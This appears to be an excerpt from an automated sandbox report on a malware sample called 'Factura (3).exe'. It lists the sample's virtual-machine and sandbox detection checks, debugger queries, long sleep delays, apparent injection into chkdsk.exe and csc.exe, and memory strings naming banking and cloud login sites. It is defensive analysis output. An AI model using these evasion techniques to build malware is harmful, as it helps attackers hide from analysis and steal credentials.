            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7492, type: MEMORYSTR
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE1209D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE1209D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLP
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE1209D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAMEP
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\WINDOWS\system32\drivers\vmmouse.sysJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\WINDOWS\system32\drivers\vmhgfs.sysJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\WINDOWS\system32\drivers\VBoxMouse.sysJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0541D1C0 rdtsc 14_2_0541D1C0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4286Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5431Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4241Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1202Jump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeWindow / User API: threadDelayed 9839Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\chkdsk.exeAPI coverage: 3.1 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696Thread sleep time: -12912720851596678s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exe TID: 420Thread sleep count: 132 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exe TID: 420Thread sleep time: -264000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exe TID: 420Thread sleep count: 9839 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exe TID: 420Thread sleep time: -19678000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe TID: 356Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe TID: 356Thread sleep time: -40500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe TID: 356Thread sleep time: -45000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340FFC58 FindFirstFileExW,6_2_00007FF7340FFC58
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0076B5C0 FindFirstFileW,FindNextFileW,FindClose,23_2_0076B5C0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: Amcache.hve.17.drBinary or memory string: VMware
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE1209D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QEMUP
            Source: 2E85-1J297.23.drBinary or memory string: global block list test formVMware20,11696497155
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE1209D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "SOFTWARE\VMware, Inc.\VMware ToolsP
            Source: 2E85-1J297.23.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: Amcache.hve.17.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
            Source: Amcache.hve.17.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: 2E85-1J297.23.drBinary or memory string: bankofamerica.comVMware20,11696497155x
            Source: 2E85-1J297.23.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
            Source: 2E85-1J297.23.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
            Source: 2E85-1J297.23.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
            Source: Amcache.hve.17.drBinary or memory string: vmci.sys
            Source: 2E85-1J297.23.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
            Source: 2E85-1J297.23.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
            Source: Amcache.hve.17.drBinary or memory string: VMware20,1
            Source: 2E85-1J297.23.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE1209D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: &C:\WINDOWS\system32\drivers\vmhgfs.sysP
            Source: Amcache.hve.17.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.17.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.17.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: 2E85-1J297.23.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
            Source: 2E85-1J297.23.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
            Source: Amcache.hve.17.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.17.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.17.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: 2E85-1J297.23.drBinary or memory string: discord.comVMware20,11696497155f
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
            Source: Amcache.hve.17.drBinary or memory string: VMware VMCI Bus Device
            Source: 2E85-1J297.23.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
            Source: Amcache.hve.17.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.17.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREP
            Source: 2E85-1J297.23.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
            Source: 2E85-1J297.23.drBinary or memory string: outlook.office.comVMware20,11696497155s
            Source: 2E85-1J297.23.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
            Source: Amcache.hve.17.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: 2E85-1J297.23.drBinary or memory string: dev.azure.comVMware20,11696497155j
            Source: Amcache.hve.17.drBinary or memory string: VMware Virtual USB Mouse
            Source: 2E85-1J297.23.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE1209D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareP
            Source: Amcache.hve.17.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.17.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.17.drBinary or memory string: VMware20,1hbin@
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE1209D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )C:\WINDOWS\system32\drivers\VBoxMouse.sysP
            Source: Amcache.hve.17.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.17.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: chkdsk.exe, 00000017.00000002.3768673482.0000000009AA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l.comVMware20,11696497155h
            Source: Amcache.hve.17.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE1209D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\P
            Source: 2E85-1J297.23.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
            Source: 2E85-1J297.23.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
            Source: 2E85-1J297.23.drBinary or memory string: tasks.office.comVMware20,11696497155o
            Source: 2E85-1J297.23.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
            Source: Amcache.hve.17.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.17.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIP
            Source: chkdsk.exe, 00000017.00000002.3764249613.0000000004F64000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.1859761297.00000226CDC9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 2E85-1J297.23.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
            Source: 2E85-1J297.23.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE1209D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'C:\WINDOWS\system32\drivers\vmmouse.sysP
            Source: 2E85-1J297.23.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
            Source: Amcache.hve.17.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.17.drBinary or memory string: \driver\vmci,\driver\pci
            Source: KAnMKAQhHABqpRuDRpLtww.exe, 00000018.00000002.3764836576.0000000001259000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
            Source: 2E85-1J297.23.drBinary or memory string: interactivebrokers.comVMware20,11696497155
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE12DAC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: Amcache.hve.17.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: 2E85-1J297.23.drBinary or memory string: AMC password management pageVMware20,11696497155
            Source: 2E85-1J297.23.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
            Source: Amcache.hve.17.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.17.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
            Source: 2E85-1J297.23.drBinary or memory string: outlook.office365.comVMware20,11696497155t
            Source: 2E85-1J297.23.drBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
            Source: powershell.exe, 00000009.00000002.1563610198.000001CE1209D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "SOFTWARE\VMware, Inc.\VMware Tools
            Source: 2E85-1J297.23.drBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0541D1C0 rdtsc 14_2_0541D1C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_004175D3 LdrLoadDll,14_2_004175D3
            Source: C:\Users\user\Desktop\Factura (3).exeCode function: 6_2_00007FF7340E7EF4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF7340E7EF4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CE53E mov eax, dword ptr fs:[00000030h]14_2_053CE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CE53E mov eax, dword ptr fs:[00000030h]14_2_053CE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CE53E mov eax, dword ptr fs:[00000030h]14_2_053CE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CE53E mov eax, dword ptr fs:[00000030h]14_2_053CE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CE53E mov eax, dword ptr fs:[00000030h]14_2_053CE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DD530 mov eax, dword ptr fs:[00000030h]14_2_053DD530
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DD530 mov eax, dword ptr fs:[00000030h]14_2_053DD530
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0535 mov eax, dword ptr fs:[00000030h]14_2_053B0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0535 mov eax, dword ptr fs:[00000030h]14_2_053B0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0535 mov eax, dword ptr fs:[00000030h]14_2_053B0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0535 mov eax, dword ptr fs:[00000030h]14_2_053B0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0535 mov eax, dword ptr fs:[00000030h]14_2_053B0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0535 mov eax, dword ptr fs:[00000030h]14_2_053B0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AD534 mov eax, dword ptr fs:[00000030h]14_2_053AD534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AD534 mov eax, dword ptr fs:[00000030h]14_2_053AD534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AD534 mov eax, dword ptr fs:[00000030h]14_2_053AD534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AD534 mov eax, dword ptr fs:[00000030h]14_2_053AD534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AD534 mov eax, dword ptr fs:[00000030h]14_2_053AD534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AD534 mov eax, dword ptr fs:[00000030h]14_2_053AD534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D7505 mov eax, dword ptr fs:[00000030h]14_2_053D7505
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D7505 mov ecx, dword ptr fs:[00000030h]14_2_053D7505
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05474500 mov eax, dword ptr fs:[00000030h]14_2_05474500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05474500 mov eax, dword ptr fs:[00000030h]14_2_05474500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05474500 mov eax, dword ptr fs:[00000030h]14_2_05474500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05474500 mov eax, dword ptr fs:[00000030h]14_2_05474500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05474500 mov eax, dword ptr fs:[00000030h]14_2_05474500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05474500 mov eax, dword ptr fs:[00000030h]14_2_05474500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05474500 mov eax, dword ptr fs:[00000030h]14_2_05474500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DB570 mov eax, dword ptr fs:[00000030h]14_2_053DB570
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DB570 mov eax, dword ptr fs:[00000030h]14_2_053DB570
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D656A mov eax, dword ptr fs:[00000030h]14_2_053D656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D656A mov eax, dword ptr fs:[00000030h]14_2_053D656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D656A mov eax, dword ptr fs:[00000030h]14_2_053D656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539B562 mov eax, dword ptr fs:[00000030h]14_2_0539B562
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0544F525 mov eax, dword ptr fs:[00000030h]14_2_0544F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0544F525 mov eax, dword ptr fs:[00000030h]14_2_0544F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0544F525 mov eax, dword ptr fs:[00000030h]14_2_0544F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0544F525 mov eax, dword ptr fs:[00000030h]14_2_0544F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0544F525 mov eax, dword ptr fs:[00000030h]14_2_0544F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0544F525 mov eax, dword ptr fs:[00000030h]14_2_0544F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0544F525 mov eax, dword ptr fs:[00000030h]14_2_0544F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A8550 mov eax, dword ptr fs:[00000030h]14_2_053A8550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A8550 mov eax, dword ptr fs:[00000030h]14_2_053A8550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0545B52F mov eax, dword ptr fs:[00000030h]14_2_0545B52F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05475537 mov eax, dword ptr fs:[00000030h]14_2_05475537
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CF5B0 mov eax, dword ptr fs:[00000030h]14_2_053CF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CF5B0 mov eax, dword ptr fs:[00000030h]14_2_053CF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CF5B0 mov eax, dword ptr fs:[00000030h]14_2_053CF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CF5B0 mov eax, dword ptr fs:[00000030h]14_2_053CF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CF5B0 mov eax, dword ptr fs:[00000030h]14_2_053CF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CF5B0 mov eax, dword ptr fs:[00000030h]14_2_053CF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CF5B0 mov eax, dword ptr fs:[00000030h]14_2_053CF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CF5B0 mov eax, dword ptr fs:[00000030h]14_2_053CF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CF5B0 mov eax, dword ptr fs:[00000030h]14_2_053CF5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C45B1 mov eax, dword ptr fs:[00000030h]14_2_053C45B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C45B1 mov eax, dword ptr fs:[00000030h]14_2_053C45B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054755C9 mov eax, dword ptr fs:[00000030h]14_2_054755C9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054735D7 mov eax, dword ptr fs:[00000030h]14_2_054735D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054735D7 mov eax, dword ptr fs:[00000030h]14_2_054735D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054735D7 mov eax, dword ptr fs:[00000030h]14_2_054735D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0541D5D0 mov eax, dword ptr fs:[00000030h]14_2_0541D5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0541D5D0 mov ecx, dword ptr fs:[00000030h]14_2_0541D5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C15A9 mov eax, dword ptr fs:[00000030h]14_2_053C15A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C15A9 mov eax, dword ptr fs:[00000030h]14_2_053C15A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C15A9 mov eax, dword ptr fs:[00000030h]14_2_053C15A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C15A9 mov eax, dword ptr fs:[00000030h]14_2_053C15A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C15A9 mov eax, dword ptr fs:[00000030h]14_2_053C15A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DE59C mov eax, dword ptr fs:[00000030h]14_2_053DE59C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D4588 mov eax, dword ptr fs:[00000030h]14_2_053D4588
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539758F mov eax, dword ptr fs:[00000030h]14_2_0539758F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539758F mov eax, dword ptr fs:[00000030h]14_2_0539758F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539758F mov eax, dword ptr fs:[00000030h]14_2_0539758F
